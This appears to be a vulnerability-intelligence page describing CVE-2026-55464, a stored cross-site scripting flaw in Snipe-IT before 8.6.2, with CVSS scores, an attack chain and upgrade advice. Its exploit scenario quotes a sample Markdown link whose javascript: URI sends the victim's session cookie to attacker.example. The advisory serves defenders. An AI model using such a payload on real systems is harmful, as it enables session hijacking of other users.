Skip to main content

Snipe-IT CVE-2026-55464

| EUVDEUVD-2026-42992 MEDIUM
Cross-site Scripting (XSS) (CWE-79)
2026-07-10 GitHub_M
4.8
CVSS 4.0 · Vendor: GitHub_M
Share

Severity by source

Vendor (GitHub_M) PRIMARY
4.8 MEDIUM
CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:A/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
vuln.today AI
5.4 MEDIUM

Network delivery, low complexity; PR:L for required assets.edit role; UI:R for mandatory victim click; S:C with C:L/I:L for session-level impact on victim.

3.1 AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
4.0 AV:N/AC:L/AT:N/PR:L/UI:A/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N

Primary rating from Vendor (GitHub_M).

CVSS VectorVendor: GitHub_M

CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:A/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Attack Vector
Network
Attack Complexity
Low
Privileges Required
Low
User Interaction
A
Scope
X

Lifecycle Timeline

2
Patch available
Jul 10, 2026 - 20:02 EUVD
Analysis Generated
Jul 10, 2026 - 19:31 vuln.today

DescriptionCVE.org

Snipe-IT is an IT asset/license management system. Prior to 8.6.2, CommonMark escapes raw HTML but does not sanitize javascript: URIs in Markdown hyperlinks, allowing a user with assets.edit permission to place a malicious link in a markdown-textarea custom field that executes arbitrary JavaScript when another user opens the asset detail page and clicks the link. This issue is fixed in version 8.6.2.

AnalysisAI

Stored cross-site scripting (XSS) in Snipe-IT before 8.6.2 allows a low-privileged user with the assets.edit permission to plant a malicious javascript: URI inside a Markdown hyperlink in a custom textarea field. When any other user opens the affected asset detail page and clicks the crafted link, arbitrary JavaScript executes in their browser session. …

Unlock full vulnerability intelligence

  • Risk assessment & exploitation conditions
  • Attack chain visualization
  • Remediation with exact patch versions
  • Threat intelligence from 22 sources
  • Personal watchlist & email alerts

Free forever · No credit card required

Attack ChainAIDerived

Hypothetical attack flow derived from CVE metadata

Access
Authenticate with assets.edit permission
Delivery
Embed javascript: URI in markdown-textarea custom field
Exploit
Asset record persisted to database
Execution
Victim opens asset detail page
Persist
Victim clicks malicious hyperlink
Impact
Arbitrary JavaScript executes in victim's browser session

Vulnerability AssessmentAI

Exploitation Exploitation requires the attacker to hold the assets.edit permission within Snipe-IT - this is a low-privilege but non-anonymous role, meaning anonymous or unauthenticated users cannot exploit this flaw. … Additional conditions and limiting factors are described in the full assessment.
Risk Assessment The CVSS 4.0 score of 4.8 (Medium) reflects the realistic risk well. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in.
Exploit Scenario An attacker who holds assets.edit permission in Snipe-IT edits an existing asset (or creates a new one) and inserts a Markdown hyperlink with a javascript: URI such as [View Details](javascript:fetch('https://attacker.example/steal?c='+document.cookie)) into a custom markdown-textarea field. A system administrator or helpdesk technician later opens that asset's detail page and clicks the seemingly legitimate link, triggering the JavaScript payload in their browser session and exfiltrating their session cookie or performing privileged actions on their behalf. …
Remediation Upgrade to Snipe-IT version 8.6.2 or later. … Detailed patch versions, workarounds, and compensating controls in full report.

Threat intelligence, references, and detailed analysis are available after sign-in.

CVE-2023-5511 HIGH POC
8.8 Oct 11

Cross-Site Request Forgery (CSRF) in GitHub repository snipe/snipe-it prior to v.6.2.3. Rated high severity (CVSS 8.8),

CVE-2022-23064 HIGH POC
8.8 May 02

In Snipe-IT, versions v3.0-alpha to v5.3.7 are vulnerable to Host Header Injection. Rated high severity (CVSS 8.8), this

CVE-2021-4130 HIGH POC
8.8 Dec 18

snipe-it is vulnerable to Cross-Site Request Forgery (CSRF). Rated high severity (CVSS 8.8), this vulnerability is remot

CVE-2021-3858 HIGH POC
8.8 Oct 19

snipe-it is vulnerable to Cross-Site Request Forgery (CSRF). Rated high severity (CVSS 8.8), this vulnerability is remot

CVE-2022-2997 HIGH POC
8.0 Aug 25

Session Fixation in GitHub repository snipe/snipe-it prior to 6.0.10. Rated high severity (CVSS 8.0), this vulnerability

CVE-2022-1155 HIGH POC
7.4 Mar 30

Old sessions are not blocked by the login enable function. Rated high severity (CVSS 7.4), this vulnerability is remotel

CVE-2021-4075 HIGH POC
7.2 Dec 06

snipe-it is vulnerable to Server-Side Request Forgery (SSRF). Rated high severity (CVSS 7.2), this vulnerability is remo

CVE-2024-48987 MEDIUM POC
6.6 Oct 11

Snipe-IT before 7.0.10 allows remote code execution (associated with cookie serialization) when an attacker knows the AP

CVE-2022-1511 MEDIUM POC
6.5 Apr 28

Missing Authorization in GitHub repository snipe/snipe-it prior to 5.4.4. Rated medium severity (CVSS 6.5), this vulnera

CVE-2021-4108 MEDIUM POC
6.1 Dec 14

snipe-it is vulnerable to Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting'). Rated me

CVE-2021-3863 MEDIUM POC
6.1 Oct 19

snipe-it is vulnerable to Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting'). Rated me

CVE-2025-65622 MEDIUM POC
5.4 Dec 01

Snipe-IT before 8.3.4 allows stored XSS via the Locations "Country" field, enabling a low-privileged authenticated user

Share

CVE-2026-55464 vulnerability details – vuln.today

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy